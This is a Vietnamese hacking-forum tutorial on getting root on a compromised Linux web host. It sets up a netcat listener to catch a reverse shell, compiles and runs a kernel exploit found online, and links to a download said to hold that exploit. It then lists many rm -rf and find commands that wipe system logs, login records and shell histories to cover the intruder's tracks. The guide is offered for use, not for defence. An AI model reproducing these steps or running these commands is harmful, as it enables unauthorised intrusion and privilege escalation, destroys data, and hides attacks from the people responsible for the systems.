[TUT] Get root

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Công cụ: netcat , shell

  Netcat: http://downloads.securityfocus.com/tools/nc110.tgz

  Di chuyển tới thư mục chứa netcat

  Mã:
  cd C:\Program Files\Netcat
  [​IMG]

  Chạy lệnh:

  Mã:
  nc -n -l -v -p 443
  [​IMG]

  Run shell và chạy lệnh để xem thông tin phiên bản kernel

  Mã:
  uname -a
  Ở đây ta có kernel 2.6.18-374 2011

  [​IMG]

  Tiếp theo ta backconnect

  [​IMG]
  Sau đó quay lại netcat nếu thấy thông báo như đoạn khoanh đỏ là đã kết nối thành công

  [​IMG]

  - Lên google tìm exploit của kernel và lưu lại dưới dạng file c. ví dụ exploit.c
  Up lên host và nén lại dưới dạng gcc

  Mã:
  gcc exploit.c -o exploit
  chmod 0777 cho nó

  Mã:
  chmod 777 exploit
  Chạy tiếp lệnh:

  Mã:
  ./exploit
  Sau đó gõ lệnh

  Mã:
  id
  để kiểm tra xem đã lên được quyền root hay chưa :)

  * Xóa dấu vết
  Sau khi xong việc thì dùng lần lượt các lệnh sau để xóa dấu vết

  Mã:
  rm -rf /tmp/logs
  rm -rf $HISTFILE
  rm -rf /root/.ksh_history
  rm -rf /root/.bash_history
  rm -rf /root/.ksh_history
  rm -rf /root/.bash_logout
  rm -rf /usr/local/apache/logs
  rm -rf /usr/local/apache/log
  rm -rf /var/apache/logs
  rm -rf /var/apache/log
  rm -rf /var/run/utmp
  rm -rf /var/logs
  rm -rf /var/log
  rm -rf /var/adm
  rm -rf /etc/wtmp
  rm -rf /etc/utmp
  history -c
  find / -name *.bash_history -exec rm -rf {} \;
  find / -name *.bash_logout -exec rm -rf {} \;
  find / -name "log*" -exec rm -rf {} \;
  find / -name *.log -exec rm -rf {} \;
  Bonus: exploit cho phiên bản kernel trong tut: http://www.mediafire.com/view/?hodtf9rt3o7rb10
   

Share This Page